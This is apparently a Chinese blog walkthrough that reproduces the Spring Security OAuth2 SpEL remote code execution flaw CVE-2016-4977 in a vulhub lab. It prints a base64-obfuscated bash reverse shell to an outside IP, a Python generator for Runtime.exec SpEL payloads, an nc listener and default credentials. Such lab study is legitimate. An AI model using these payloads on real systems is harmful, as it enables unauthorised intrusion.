vulhub spring 远程命令执行漏洞(CVE-2016-4977)

最新推荐文章于 2024-10-11 17:25:28 发布
最新推荐文章于 2024-10-11 17:25:28 发布
阅读量486 收藏 2
点赞数 18
文章标签: spring java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_82061181/article/details/142026621
版权

步骤一:执行以下命令启动靶场环境并在浏览器访问

cd /vulhub/spring/CVE-2016-4977#进入漏洞环境所在目录
docker-compose up -d #启动靶场 
docker ps #查看容器信息

步骤二:访问环境

步骤三:192.168.0.107:8080/oauth/authorize?response_type=${2*2}&client_id=acme&scope=openid&redirect_uri=http://test

输入默认口令admin:admin即可

步骤四:反弹shell

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTMuMjMxLjAvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}

步骤五:创建poc.py,下面内容写入
message = input('Enter message to encode:')
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
for ch in message[1:]:
   poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)

poc += ')}'
print(poc)

CVE-2016-4977目录中运行poc 输入生成的shell

步骤五:

nc -lvvp 6666

复制poc生成的链接,仅替换${2*2}部分,保留后面的client_id部分

成功反弹,命令执行成功

云舒zovn
关注
vulhubspringCVE-2016-4977漏洞复现
yougexiaojiuguan的博客
11-29 554
学习过程中的记录,方便以后查看。
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977
qq_54713392的博客
05-08 794
Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977漏洞原理: Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)在vulhub靶场...
漏洞复现----39、Spring Security OAuth2 远程命令执行漏洞 (CVE-2016-4977)
七天
06-29 1268
Spring Security OAuth2 远程命令执行漏洞 (CVE-2016-4977)
vulhub spring 远程命令执行漏洞CVE-2016-4977)
2301_81881972的博客
09-09 419
CVE-2016-4977目录中运行poc 输入生成的shell。输入默认口令admin:admin即可。
CVE-2022-22965:Spring远程代码执行漏洞
热门推荐
一只爱吃橙子的羊
04-09 3万+
CVE-2022-22965:Spring Framework远程代码执行漏洞
Spring Security OAuth2 远程代码执行漏洞分析(CVE-2016-4977/CVE-2018-1260)
mole_exp的博客
02-22 5764
Spring Security OAuth2 远程代码执行漏洞分析(CVE-2016-4977/CVE-2018-1260)
spring Security OAuth2 远程命令执行漏洞CVE-2016-4977)复现-kali
qq_41760817的博客
12-04 1288
spring Security OAuth2 远程命令执行漏洞CVE-2016-4977)复现
CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(超详细版!)
精品博客,你值得一看~
09-02 1278
它是为了解决企业应用开发的复杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.
Spring Messaging 远程命令执行漏洞 CVE-2018-1270 检测脚本
liangjiao_shou的博客
07-24 138
spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用StandardEvaluationContext解析,造成命令执行漏洞Spring messaging为spring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,Spring Messaging 远程命令执行漏洞 CVE-2018-1270 检测脚本。
漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1372
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
CVE-2016-4977) SpringSecurityOauth 远程命令执行
weixin_45253622的博客
12-10 1718
漏洞简介: Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块,其维护者发布了这样一个升级公告,主要说明在用户使用Whitelabel views来处理错误时,攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令Spring Security OAuth 支持使用标准 SpringSpring Security 编程模型和配置习惯用法与 OAuth (1a) 和 OAuth2 一起使用 Spring Security。在使用白标签视图进行错误处理时,
Spring Cloud Gateway远程代码执行漏洞CVE-2022-22947)
初岄的博客
07-09 916
Spring Cloud Gateway远程代码执行漏洞CVE-2022-22947)
Spring MVC的运行流程详解
J老熊
10-03 1083
Spring MVC作为一个广泛使用的框架,提供了灵活且强大的MVC架构支持。尤其在业务系统中,Spring MVC能够有效地处理大量并发请求,提供良好的用户体验。本文将详细讲解Spring MVC的运行流程,以电商交易系统为案例,帮助读者深入理解其工作原理。
netty之SpringBoot+Netty+Elasticsearch收集日志信息数据存储
CSDN_LiMingfly的博客
10-04 888
将大量的业务以及用户行为数据存储起来用于分析处理,但是由于数据量较大且需要具备可分析功能所以将数据存储到文件系统更为合理。尤其是一些互联网高并发级应用,往往数据库都采用分库分表设计,那么将这些分散的数据通过binlog汇总到一个统一的文件系统就显得非常有必要。#开发环境环境准备windows安装包 下载注意 es是以来java环境 所以需要安装jdk 支持1.7以上es-hander下载可视化操作插件@Id//姓名//年龄//级别//时间//电话//邮箱//地址。
springboot 通过自定义注解方式动态控制日志级别进行日志的输出或者关闭
最新发布
A_awen的博客
10-11 188
springboot 通过自定义注解方式动态控制日志级别进行日志的输出或者关闭
Spring Security OAuth2.0认证授权
mry6的博客
10-09 143
Spring Security OAuth2.0认证授权目录基本概念基于Session的认证方式Spring-Security快速上手Spring-Security应用详解分布式系统认证方案OAuth2.0Spring-Security实现分布式系统授权 目录 基本概念 基于Session的认证方式 Spring-Security快速上手 Spring-Security应用详解 分布式系统认证方案 OAuth2.0 Spring-Security实现分布式系统授权
SpringBoot线程问题
juanmiao的专栏
10-04 528
程序,线程,线程池进程是资源分配最小单位,线程是程序执行的最小单位。计算机在执行程序时,会为程序创建相应的进程,进行资源分配时,是以进程为单位进行相应的分配,每个进程都有相应的线程,在执行程序是,实际上是执行相应的一系列线程。线程:程序执行流的最小执行单位,是行程中实际运作单位,经常容易和进程这个概念混淆简单来说,一个应用程序的运行就可以被看做是一个进程。是运行中实际的执行任务者,可以说,进程中包含了多个可以同时运行的线程。线程的生命周期。
Pegasus内核漏洞CVE-2016-4655 & CVE-2016-4656分析与利用详解
"本文主要分析了Pegasus间谍软件利用的两个内核漏洞CVE-2016-4655和CVE-2016-4656,这两个漏洞影响了OSX 10.11.6和iOS 9.3.4版本。文章深入探讨了漏洞的原理和利用技术,特别是对OSUnserializeBinary的二进制反...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值